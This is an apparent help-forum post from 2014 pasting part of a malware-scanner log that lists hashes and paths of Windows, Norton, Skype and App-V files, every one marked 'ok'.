12:17:19.0902 0x1aa8 [ AC001439788F9A5A34F2BC2623A77B35, 1FF38BFD71F6B54404F0FF7E9571D0A73E85994C72BD3A1F0562C5AAFC09BACB ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\dimaster.dll
12:17:19.0902 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\dimaster.dll - ok
12:17:19.0906 0x1aa8 [ C94CE65AE7701E9FDBA889045543E27C, E6D75322BE3076EB3AB4622C29A0765C05465BE355C9AA3A9DE7431F020BC176 ] C:\Windows\SysWOW64\secur32.dll
12:17:19.0906 0x1aa8 C:\Windows\SysWOW64\secur32.dll - ok
12:17:19.0909 0x1aa8 [ 50D9949020E02B847CD48F1243FCB895, 5BDAD5E44DE5B412645142810C5FCE4B2D9685F928FF4A6B836A9DCE7725BD78 ] C:\Program Files (x86)\Skype\Updater\Updater.exe
12:17:19.0909 0x1aa8 C:\Program Files (x86)\Skype\Updater\Updater.exe - ok
12:17:19.0913 0x1aa8 [ 2A86C18CE6869C77FCEB62F3B47D4D5B, 6E282C56A208E26C8921CC396F4AF9D1681D26E3B22126FAEF3640400864B29F ] C:\Windows\SysWOW64\credssp.dll
12:17:19.0913 0x1aa8 C:\Windows\SysWOW64\credssp.dll - ok
12:17:19.0916 0x1aa8 [ A90DC9ABD65DB1A8902F361103029952, 26798758976CE53251AC342B966BE0363AE1794BD965C452F5DEBC33E18969F0 ] C:\Windows\SysWOW64\IPHLPAPI.DLL
12:17:19.0916 0x1aa8 C:\Windows\SysWOW64\IPHLPAPI.DLL - ok
12:17:19.0919 0x1aa8 [ CFF35B879D1618D42C86644C717BA947, 1837275202628D3320867A3BF8CFDA15491730C4B74215F7C0D7E140BF01AC3C ] C:\Windows\SysWOW64\winnsi.dll
12:17:19.0919 0x1aa8 C:\Windows\SysWOW64\winnsi.dll - ok
12:17:19.0924 0x1aa8 [ 704314FD398C81D5F342CAA5DF7B7F21, CDA660E1E8AAE0789780B6B9604B138E67B2BDD1404A5E4C2354B35879D43085 ] C:\Windows\SysWOW64\wbemcomn.dll
12:17:19.0924 0x1aa8 C:\Windows\SysWOW64\wbemcomn.dll - ok
12:17:19.0927 0x1aa8 [ C5B0324DB461559ADD070E632A6919FA, AB09CACB5B7DD372B27921A5E01220552A611CECA27EF87961001FA467FDED45 ] C:\Windows\SysWOW64\wbem\wbemprox.dll
12:17:19.0927 0x1aa8 C:\Windows\SysWOW64\wbem\wbemprox.dll - ok
12:17:19.0931 0x1aa8 [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] C:\Windows\System32\drivers\srvnet.sys
12:17:19.0931 0x1aa8 C:\Windows\System32\drivers\srvnet.sys - ok
12:17:19.0935 0x1aa8 [ 178A681B49A33FAF084E6D2DBA7678CC, 58FA01A257ED7C405D18672D37C7FF84C03516DB3750DF65A8B9F77CFCAA24F7 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccset.dll
12:17:19.0935 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccset.dll - ok
12:17:19.0939 0x1aa8 [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] C:\Windows\System32\drivers\tcpipreg.sys
12:17:19.0939 0x1aa8 C:\Windows\System32\drivers\tcpipreg.sys - ok
12:17:19.0943 0x1aa8 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] C:\Windows\System32\wiaservc.dll
12:17:19.0943 0x1aa8 C:\Windows\System32\wiaservc.dll - ok
12:17:19.0946 0x1aa8 [ 6234CB2FEF5AB860DD50EF1902FFFF08, 825E2A417A44861306A8320EB4FC5E80E68DED0041A2E6F3DDBABA33969B0355 ] C:\Program Files (x86)\SMART BRO\AssistantServices.exe
12:17:19.0946 0x1aa8 C:\Program Files (x86)\SMART BRO\AssistantServices.exe - ok
12:17:19.0950 0x1aa8 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] C:\Windows\System32\trkwks.dll
12:17:19.0950 0x1aa8 C:\Windows\System32\trkwks.dll - ok
12:17:19.0954 0x1aa8 [ 575E80D2B1A8112DF130ACDBF7C0081D, BE26A84D14BB415C570E56EB12F11BFB85B2205BBD9CC1F99976BDFFC6A3C34B ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccgevt.dll
12:17:19.0954 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccgevt.dll - ok
12:17:19.0958 0x1aa8 [ 0364256B4A2A93A8C8CDA6B3B5A0EFF5, BDA403E6CACC249C467671FB1FAF7B77FB019326BC18F9F6CF377104520E2654 ] C:\Windows\System32\wiatrace.dll
12:17:19.0958 0x1aa8 C:\Windows\System32\wiatrace.dll - ok
12:17:19.0962 0x1aa8 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
12:17:19.0962 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE - ok
12:17:19.0965 0x1aa8 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] C:\Windows\System32\wbem\WMIsvc.dll
12:17:19.0966 0x1aa8 C:\Windows\System32\wbem\WMIsvc.dll - ok
12:17:19.0969 0x1aa8 [ 7DB5AA22A8A8E5C2D335F44853C1F6DE, A734A20357026C42950394682A52CBC3AF956D09F1949E1B4E95467E999BC428 ] C:\Windows\System32\wbemcomn.dll
12:17:19.0969 0x1aa8 C:\Windows\System32\wbemcomn.dll - ok
12:17:19.0974 0x1aa8 [ D6E081235FE41979BBFBD81B72A5993A, 5B33C82B13449CEAEBDE12C9682A3B0BA9390C5038EDA00FBBDF564472155456 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccglog.dll
12:17:19.0974 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccglog.dll - ok
12:17:19.0977 0x1aa8 [ 0255C22D99602534F15CBB8D9B6F152F, 43CD89D6CA56E0B633142F7C86DA9E072EE0723B5EBC4CE8CCBCA58C396ECF54 ] C:\Windows\System32\wbem\WinMgmtR.dll
12:17:19.0978 0x1aa8 C:\Windows\System32\wbem\WinMgmtR.dll - ok
12:17:19.0981 0x1aa8 [ 0C52762C606BCF6A377D5E4688191A6B, C58C9A73AD07E3B93AB186D0D47C5F1CB7197771DBEE40646C3B801645BB388F ] C:\Windows\System32\wbem\WmiDcPrv.dll
12:17:19.0981 0x1aa8 C:\Windows\System32\wbem\WmiDcPrv.dll - ok
12:17:19.0985 0x1aa8 [ A3F5E8EC1316C3E2562B82694A251C9E, F3DC6AA6A9D3B5BBC730668FC52C1D4BB5D515D404578BDDD3D4869A7ED58822 ] C:\Windows\System32\wbem\fastprox.dll
12:17:19.0985 0x1aa8 C:\Windows\System32\wbem\fastprox.dll - ok
12:17:19.0988 0x1aa8 [ 3958B8304E31B9C674EC33A436C1C259, 7BFFEFF372393667A3305C00C8EED1BA86DFACDC10A2C91F5D4C5D38C30A8C71 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccjobmgr.dll
12:17:19.0989 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccjobmgr.dll - ok
12:17:19.0993 0x1aa8 [ 5EB55F661DEBF156E126160BCD4D89F8, 948D1F627AA55D55FB3B558BA61B8366C5481A6041820631F24408F75EA5D2CC ] C:\Windows\System32\wbem\wbemcore.dll
12:17:19.0993 0x1aa8 C:\Windows\System32\wbem\wbemcore.dll - ok
12:17:19.0997 0x1aa8 [ EE26D130808D16C0E417BBBED0451B34, 4886DCE4FAEF146A40BABD492A8000A2022FEA542A6135A9BAFD4CD09297B4E5 ] C:\Windows\System32\ntdsapi.dll
12:17:19.0997 0x1aa8 C:\Windows\System32\ntdsapi.dll - ok
12:17:20.0000 0x1aa8 [ B837D1528CE2E3CB79F09496BC08DDC6, ACD54CE61CFE94F23DC283537AD8FFBEB3D6041BD30317B60BA7A10FCB240A27 ] C:\Windows\System32\SensApi.dll
12:17:20.0000 0x1aa8 C:\Windows\System32\SensApi.dll - ok
12:17:20.0004 0x1aa8 [ 08DFDBD2FD4EA951DC46B1C7661ED35A, D926530C659DDAF80770663F46F1EFD94FFB4AAB475C4E3367CB531AF4A734E1 ] C:\Windows\SysWOW64\powrprof.dll
12:17:20.0004 0x1aa8 C:\Windows\SysWOW64\powrprof.dll - ok
12:17:20.0008 0x1aa8 [ 93812FDC01AA864195816CD814445F95, E5CB2576DA2905177AFD342DBE63E17CF626F93F430DEBC55155C18C60166BEE ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\SQMAPI.DLL
12:17:20.0008 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\SQMAPI.DLL - ok
12:17:20.0012 0x1aa8 [ 666A60F6F5E719856FF6254E0966EFF7, 58C072E7E215991E19C1CA062C476081982F7B9F039714539AE7FEB4981C200F ] C:\Windows\System32\wbem\wbemprox.dll
12:17:20.0012 0x1aa8 C:\Windows\System32\wbem\wbemprox.dll - ok
12:17:20.0016 0x1aa8 [ 1075AB2C077B415760C0E948856B5126, D67804B4A038FC06BD84CBF9C047DD4C13073622027F825371DB98867EF4E9B9 ] C:\Windows\System32\wer.dll
12:17:20.0016 0x1aa8 C:\Windows\System32\wer.dll - ok
12:17:20.0019 0x1aa8 [ 9A69BFE3B99D31B9B0ACBF72583DE694, 09E1D62E83733ABA82CA6B2E7DBD37EF442BE1FD0071EEDE067626D24984D63B ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\sqsvc.dll
12:17:20.0019 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\sqsvc.dll - ok
12:17:20.0023 0x1aa8 [ 087D8668C71634A3A3761135ABF16EEE, B7348A63299CFF4FFBF375E645A4850AE0F108D48D13AB25434CFAE7CF3D61FD ] C:\Windows\System32\wbem\esscli.dll
12:17:20.0024 0x1aa8 C:\Windows\System32\wbem\esscli.dll - ok
12:17:20.0028 0x1aa8 [ 718B6F51AB7F6FE2988A36868F9AD3AB, 76141B4E94C2766E2C34CEF523092948771A7893212EFADBE88D2171B85FF012 ] C:\Windows\System32\wbem\wbemsvc.dll
12:17:20.0028 0x1aa8 C:\Windows\System32\wbem\wbemsvc.dll - ok
12:17:20.0032 0x1aa8 [ 0143DB80DACFB7C2B5B7009ED9063353, 252885CF7C1BAB89B86908373546E5F5D674BEF7AACBDDCF321AD877CB9150A9 ] C:\Windows\System32\wbem\wmiutils.dll
12:17:20.0032 0x1aa8 C:\Windows\System32\wbem\wmiutils.dll - ok
12:17:20.0035 0x1aa8 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] C:\Windows\System32\iphlpsvc.dll
12:17:20.0035 0x1aa8 C:\Windows\System32\iphlpsvc.dll - ok
12:17:20.0039 0x1aa8 [ 77C5A741A7452812F278EF2C18478862, 0B763679EB7EFB8ED9DCE7B429706E939BB65BA6BCF1BAE0E0426D4E87074B8C ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
12:17:20.0039 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe - ok
12:17:20.0044 0x1aa8 [ 27B9E163740A226B65E4B9E186117911, 17411C6A6C1E699BC4B0C04D782FD9AA09CF577DBA41E743F7588904D489CB9F ] C:\Windows\System32\sqmapi.dll
12:17:20.0044 0x1aa8 C:\Windows\System32\sqmapi.dll - ok
12:17:20.0048 0x1aa8 [ 352B3DC62A0D259A82A052238425C872, 393B24E0D6007C74AEE2FB2EE2C18623D37DF64E279B6767952DCFEE0EACBB10 ] C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
12:17:20.0048 0x1aa8 C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll - ok
12:17:20.0052 0x1aa8 [ 3F1D0820E8F8A3E4F99333A6DCC2B95A, 61238B92EABA8175CDD1944CEB985128736B2515BFCF65B94108DC72747E9AA6 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftsync.dll
12:17:20.0052 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftsync.dll - ok
12:17:20.0056 0x1aa8 [ 7B38D7916A7CD058C16A0A6CA5077901, 3F6DD990E2DA5D3BD6D65A72CBFB0FE79EB30B118A8AD71B6C9BB5581A622DCE ] C:\Windows\System32\wdscore.dll
12:17:20.0056 0x1aa8 C:\Windows\System32\wdscore.dll - ok
12:17:20.0060 0x1aa8 [ E70E7C2EEC214FB2FE50DBFC8E98CB85, 3884117DB6B9CAEC669DAF4D2B2068CEE31298967C7EEC9DF5379D1A6A800659 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftuser.dll
12:17:20.0060 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftuser.dll - ok
12:17:20.0064 0x1aa8 [ 0AB34456654C283DAA13B8D2BA21439B, 4B70FC5195DE39564E951C8542020BA3D4257E3D4488F69825F67A6099CB7549 ] C:\Windows\System32\wbem\repdrvfs.dll
12:17:20.0064 0x1aa8 C:\Windows\System32\wbem\repdrvfs.dll - ok
12:17:20.0067 0x1aa8 [ B9A8CBCFCD3EC9D2EA4740AF347BF108, 97FA304E3880BC863D999F441AE47CB8ADF00D2DEC2A52ACD8FBD02CC096786A ] C:\Windows\SysWOW64\mpr.dll
12:17:20.0067 0x1aa8 C:\Windows\SysWOW64\mpr.dll - ok
12:17:20.0071 0x1aa8 [ 3B367397320C26DBA890B260F80D1B1B, 50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147 ] C:\Windows\System32\hnetcfg.dll
12:17:20.0071 0x1aa8 C:\Windows\System32\hnetcfg.dll - ok
12:17:20.0074 0x1aa8 [ 85181D316D88082CF39D2F33FD47C6B5, F92AEA12F662BDCE7EE950B41B06454797996E596CBF3482F9A406B21782E28C ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftcore.dll
12:17:20.0074 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftcore.dll - ok
12:17:20.0079 0x1aa8 [ FEB91B4DA0D540865260A33838654FA3, 8636B008BA329D3E6CC235D08BA4C914EFF45DBFCB9297C893CCDA8D907BA946 ] C:\Windows\System32\nci.dll
12:17:20.0079 0x1aa8 C:\Windows\System32\nci.dll - ok
12:17:20.0082 0x1aa8 [ 776AE0564F8B1C282E331FD95A1BDC5F, 601CFCA3922FFEA46A54AD323845A76A12FC6AF9FF64E9B0AE294FBB1AFCF4CB ] C:\Windows\SysWOW64\wbem\wbemsvc.dll
12:17:20.0082 0x1aa8 C:\Windows\SysWOW64\wbem\wbemsvc.dll - ok
12:17:20.0086 0x1aa8 [ CFC7D8289D2B5F3CF8D16E2DB7F93D4A, 61B4D669C692775EF361445293163E84FAD8636AC49C8047BE806DB4E4093291 ] C:\Windows\SysWOW64\wbem\fastprox.dll
12:17:20.0086 0x1aa8 C:\Windows\SysWOW64\wbem\fastprox.dll - ok
12:17:20.0089 0x1aa8 [ DDD0357A92FA843EFF8915ED17253D6C, 0C78B1D41F0A7821186ADF653504F2BFF067CB512CB0E932047C301378BBADB6 ] C:\Windows\System32\wbem\WmiPrvSD.dll
12:17:20.0090 0x1aa8 C:\Windows\System32\wbem\WmiPrvSD.dll - ok
12:17:20.0093 0x1aa8 [ D41FEBD098234F02485A4EA98D4730A4, 462DC8168C444F35B43BA3B8F7D77734665D84F1C6D25CAD7391C0145961628F ] C:\Windows\System32\ncobjapi.dll
12:17:20.0093 0x1aa8 C:\Windows\System32\ncobjapi.dll - ok
12:17:20.0097 0x1aa8 [ E3E811471DE781900FF21C1FD84E941E, 2A47FF52D1D6480AAD1919382E783EA184BF926311F8C7E466FEBE9F6FB88FD6 ] C:\Windows\SysWOW64\ntdsapi.dll
12:17:20.0097 0x1aa8 C:\Windows\SysWOW64\ntdsapi.dll - ok
12:17:20.0100 0x1aa8 [ 6F40D6FB05E0C1E5402812B426971AF0, E41F138F0F2DB057F8DBB1587237C6FA8A2059B3D64EC894D1DC492A18DBBDED ] C:\Windows\System32\wbem\wbemess.dll
12:17:20.0100 0x1aa8 C:\Windows\System32\wbem\wbemess.dll - ok
12:17:20.0104 0x1aa8 [ 04802656F1533337D99A913241992739, 49E84B9A0B9EFD8FD350349395C6B41EC1CBF0AFDF7154DE4281B32EFD5EA52E ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\spocclnt.dll
12:17:20.0104 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\spocclnt.dll - ok
12:17:20.0108 0x1aa8 [ 2FCA0D2C59A855C54BAFA22AA329DF0F, ED9D26F539065D62FCCEDEEC8E509B30F4D15F8DA586C1F657ACEFE9DABAACD0 ] C:\Windows\SysWOW64\netapi32.dll
12:17:20.0108 0x1aa8 C:\Windows\SysWOW64\netapi32.dll - ok
12:17:20.0112 0x1aa8 [ 20B3934DB73EABA2B49B7177873CB81F, 492EAC5C51472B43DE11825358AEC4B9E3A081DACFD7513C696D6FE40F302EE5 ] C:\Windows\SysWOW64\netutils.dll
12:17:20.0112 0x1aa8 C:\Windows\SysWOW64\netutils.dll - ok
12:17:20.0116 0x1aa8 [ 5CCDCD40E732D54E0F7451AC66AC1C87, 66F4DA105BD72E41250CD59E2B3CD931B47AC9FDB6C784B9E33C5EE1AC29841F ] C:\Windows\SysWOW64\srvcli.dll
12:17:20.0116 0x1aa8 C:\Windows\SysWOW64\srvcli.dll - ok
12:17:20.0119 0x1aa8 [ 7523E7D2AB0C49585C0C199264B2BD73, C8E2E0DE2DB7CBC3DD86D4A4A7CB36848B38F8D108DA260C4165F154297BE6DA ] C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
12:17:20.0119 0x1aa8 C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig600.dll - ok
12:17:20.0123 0x1aa8 [ E5A4A1326A02F8E7B59E6C3270CE7202, DCB76016F9AC47E631540874DA208A089F9D529DA9628705A2869B954526BFE0 ] C:\Windows\SysWOW64\wkscli.dll
12:17:20.0123 0x1aa8 C:\Windows\SysWOW64\wkscli.dll - ok
12:17:20.0125 0x1aa8 [ 9D79C992E1607D2CD7B13A0F97557858, 4D2DFF755C54E93ECEDD12F3A4DB856BA9AA4375DB06F5D8DB8D15C26347D361 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftpsr.dll
12:17:20.0125 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftpsr.dll - ok
12:17:20.0130 0x1aa8 [ 0D298133C359AB8CB9EB4FA178BF3947, C876CE5E463BB116E41D1C90105D75F2DFCAEBF5FDE2A68AED0D2988470CEB31 ] C:\Windows\System32\msxml3.dll
12:17:20.0130 0x1aa8 C:\Windows\System32\msxml3.dll - ok
12:17:20.0134 0x1aa8 [ 8AA502B025916688E71E55BB59BED6F9, EB527CFF2C45753C580C30ACCB8BCE0961383994F1BDDF8A1B6138C220D7AD03 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftfsi_wow64.dll
12:17:20.0134 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftfsi_wow64.dll - ok
12:17:20.0137 0x1aa8 [ 619A67C9F617B7E69315BB28ECD5E1DF, F34F231D117CCDFEBB9CB35C8D6FDFA7051DA27FDC1204FCCFF361FC0B13A0FF ] C:\Windows\System32\wbem\WmiPrvSE.exe
12:17:20.0138 0x1aa8 C:\Windows\System32\wbem\WmiPrvSE.exe - ok


----------



## raphael100 (May 24, 2014)

12:17:20.0141 0x1aa8 [ FC2ACC5609DE2279101853A3B2DBB7AD, AEFEBDBDA72FD23F361516275406067B22ED55E8126C397FAD40FE1F2F38C109 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\datastor.dll
12:17:20.0141 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\datastor.dll - ok
12:17:20.0145 0x1aa8 [ 79AFFC7FEEA9CD2FEFEA5EF3B631A02C, 78889511D6F471009674CC958F8BB77B4A79C952634B18E8AFF4A75AA6A60E87 ] C:\Windows\System32\ndiscapCfg.dll
12:17:20.0145 0x1aa8 C:\Windows\System32\ndiscapCfg.dll - ok
12:17:20.0149 0x1aa8 [ 3D6AF45673C4B31CDECD7F80AF09D443, 7D711D138C107816155AFA5E5FDC6892734074BEFF604B5904177B5D9ACE4670 ] C:\Windows\System32\rascfg.dll
12:17:20.0149 0x1aa8 C:\Windows\System32\rascfg.dll - ok
12:17:20.0153 0x1aa8 [ 2DF29664ED261F0FC448E58F338F0671, 4EFE79C383D0AF126FC4EE668D822563F8F037B1E61D73747A35FE11AAFDB8CE ] C:\Windows\System32\mprapi.dll
12:17:20.0153 0x1aa8 C:\Windows\System32\mprapi.dll - ok
12:17:20.0156 0x1aa8 [ 2A46FFE841EC43001D5A293A54DB34DE, 8ED96FA434B48B0C1772195ED477536960C84CAFCE9A9A43543DFFA85483B00D ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
12:17:20.0157 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE - ok
12:17:20.0160 0x1aa8 [ E4E829EE073E046B0EB19B5FECB19B8C, E5D6579A6037EA822EF8ECFFDFDFC3FDDCEE5E755192F0C4E81C1BAB498F06F0 ] C:\Windows\SysWOW64\wininet.dll
12:17:20.0160 0x1aa8 C:\Windows\SysWOW64\wininet.dll - ok
12:17:20.0165 0x1aa8 [ 01C9965256722A1E26AEC7C5FB763F56, 1C072F20EE4EB5C80BECCB82CACF5A757B604F235EDFFB81E9512F7F42D67AB5 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\sqlite.dll
12:17:20.0165 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\sqlite.dll - ok
12:17:20.0168 0x1aa8 [ 1CF21800E337F4039AAD4C94B4280EE4, EF434CEF6E62A202B85E8EC7916EB998E20B10675437CDE90084CDA938C0AA3F ] C:\Windows\System32\mprmsg.dll
12:17:20.0168 0x1aa8 C:\Windows\System32\mprmsg.dll - ok
12:17:20.0172 0x1aa8 [ 55DE45B116711881C852D2841E4C84DD, 18E5021530BB44042C85087BAE4FEDA633E01CDCBA09C90A5941B74C75133A35 ] C:\Windows\System32\tcpipcfg.dll
12:17:20.0172 0x1aa8 C:\Windows\System32\tcpipcfg.dll - ok
12:17:20.0175 0x1aa8 [ 6607C2182C6A53ED983813AFE2F85768, FC9E718ABC4E0FBC7B0DD145F9C377A1800A7776AD832AB645796E13B1E15A1F ] C:\Windows\System32\wbem\cimwin32.dll
12:17:20.0176 0x1aa8 C:\Windows\System32\wbem\cimwin32.dll - ok
12:17:20.0179 0x1aa8 [ EA87C9399930B961A7DE90457033C687, 56F3C0D7639BB6F6442B1DD09D2F59186611B69FBE111DC20EEFF4FFCD25A1B6 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\comm.dll
12:17:20.0180 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\comm.dll - ok
12:17:20.0183 0x1aa8 [ 6951562DC4625EEFC6EACD52AD165866, 44A0B3EA0232D613A5B4115492DF2A7CEF25B35300E6A3E3E50C9544C5D1049E ] C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
12:17:20.0183 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll - ok
12:17:20.0187 0x1aa8 [ 589CBC4989F750E1DA35625AB481CF43, B93E1B8C3775F9C995FD5451C685A06DEFD24AE1DF0DD99D19D5E4B9AC0010F9 ] C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll
12:17:20.0187 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll - ok
12:17:20.0191 0x1aa8 [ 3BE0D923AA45A4DBE091C2D84F0B4FE7, 603EEC55D6F646150FC3F0F2C939CFE434C02FC7A7AB23B1FEC8B5C77E4C8381 ] C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll
12:17:20.0191 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll - ok
12:17:20.0194 0x1aa8 [ 2E33DFD10F28F86C3FC40EE123CC3904, 57C65671A04EFCA437A69E8E97B2FCA17897EE4608C7DB69F77D44FBD3490B50 ] C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll
12:17:20.0194 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll - ok
12:17:20.0199 0x1aa8 [ 05BD47136DE62FAFE9F95B40E4100144, D10F05408F3D90A6256C57ADA9A85B1D69A4DE7988A781F08350A3D85C49B099 ] C:\Windows\SysWOW64\iertutil.dll
12:17:20.0199 0x1aa8 C:\Windows\SysWOW64\iertutil.dll - ok
12:17:20.0202 0x1aa8 [ 6A13B4F3B3F575F1E24B877B9359AABA, 676AD5F8F709D4A9DCE9938D82DEEE329C9A385A6969C169B3DF37AA75F1E4C7 ] C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll
12:17:20.0203 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll - ok
12:17:20.0207 0x1aa8 [ 66E073D8D83833DB525B4174C060E840, E8FD9A0A7E166DCEA3717CF184EB4D86600F837DE55CF9C036440BCEFBC09508 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftcomp.dll
12:17:20.0207 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftcomp.dll - ok
12:17:20.0210 0x1aa8 [ 1484B9EBF567346582DE571B0E164AE0, 9862BF22B2E32DABE7A82ACEE5B4EA1F0A93BDC3C71B20A6A4E568CCCD76A7A6 ] C:\Windows\System32\framedynos.dll
12:17:20.0210 0x1aa8 C:\Windows\System32\framedynos.dll - ok
12:17:20.0215 0x1aa8 [ 68ECCA523ED760AAFC03C5D587569859, CDD734279C8F9F24EA2538BAD8E91EB8C3DD74C33032DB6B2D85C19576B42707 ] C:\Windows\SysWOW64\samcli.dll
12:17:20.0215 0x1aa8 C:\Windows\SysWOW64\samcli.dll - ok
12:17:20.0218 0x1aa8 [ DF13A51A5C591887D2EC6AE64CEED0FA, DFD503AEBCAA056B2B0E669ACA52F6D26F4E6892F2DCFCCD902752C23A621653 ] C:\Windows\SysWOW64\wsock32.dll
12:17:20.0219 0x1aa8 C:\Windows\SysWOW64\wsock32.dll - ok
12:17:20.0222 0x1aa8 [ 8EA53101FF2B15BDFF934B62A8FB326D, E28536A4AC6764C2480EF047AF2312AE2600819899C3E33B486CFE19F25AC464 ] C:\Windows\SysWOW64\logoncli.dll
12:17:20.0222 0x1aa8 C:\Windows\SysWOW64\logoncli.dll - ok
12:17:20.0226 0x1aa8 [ 09054EF41D33805CBF97EB7524510054, 932A79A6F0DF640A7BFE0190C94F63FCEBC858C4CE3D5EDBB28CF33A96FA48C0 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\nahelper.dll
12:17:20.0226 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\nahelper.dll - ok
12:17:20.0230 0x1aa8 [ 210FCACAF902B2CD47CF9FD17D846146, 3F77AC721E084864C5966FF5337A90185F62203DC19C685328675500D629CB87 ] C:\Windows\System32\aeevts.dll
12:17:20.0230 0x1aa8 C:\Windows\System32\aeevts.dll - ok
12:17:20.0234 0x1aa8 [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] C:\Windows\System32\drivers\srv2.sys
12:17:20.0234 0x1aa8 C:\Windows\System32\drivers\srv2.sys - ok
12:17:20.0237 0x1aa8 [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] C:\Windows\SysWOW64\netprofm.dll
12:17:20.0237 0x1aa8 C:\Windows\SysWOW64\netprofm.dll - ok
12:17:20.0241 0x1aa8 [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] C:\Windows\System32\drivers\srv.sys
12:17:20.0241 0x1aa8 C:\Windows\System32\drivers\srv.sys - ok
12:17:20.0244 0x1aa8 [ 0BA65122FFA7E37564EE86422DBF7AE8, 3A37FC503D3228D021473AECA285427382518CC36C197E4C9912745BDF3AB757 ] C:\Windows\SysWOW64\nlaapi.dll
12:17:20.0244 0x1aa8 C:\Windows\SysWOW64\nlaapi.dll - ok
12:17:20.0248 0x1aa8 [ 748849C42DEA24C723048E24BCA1BD55, 517DDE70E7CB8E94C6E8B9B05CCD4BC6490A8837FD8BB874C9E1186D8EF07659 ] C:\Windows\System32\wshbth.dll
12:17:20.0248 0x1aa8 C:\Windows\System32\wshbth.dll - ok
